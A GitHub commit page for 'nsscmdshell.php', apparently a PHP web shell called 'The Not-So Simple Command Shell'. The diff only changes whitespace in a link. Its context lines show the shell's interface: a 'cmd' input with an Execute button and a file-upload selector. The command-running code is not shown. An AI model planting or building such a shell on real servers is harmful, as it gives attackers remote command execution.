We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 267273f commit 0364c0dCopy full SHA for 0364c0d
nsscmdshell.php
@@ -30,7 +30,7 @@
30
<div style="border:1px solid #333;width:50%;padding:0px 30px;border-radius:10px;margin:10px 40px;">
31
<p style=""><small>The Not-So Simple Command Shell - Courtesy of KaotickJ</small></p>
32
<form action="" method="get">Command? <input type="text" name="cmd" autofocus/>
33
- <button type="submit">Execute</button> <a href="?links=1"> QuickLinks</a></form><br>
+ <button type="submit">Execute</button> <a href="?links=1">QuickLinks</a></form><br>
34
File Options<br>
35
<form action="" method="get">
36
<select name="upload">
0 commit comments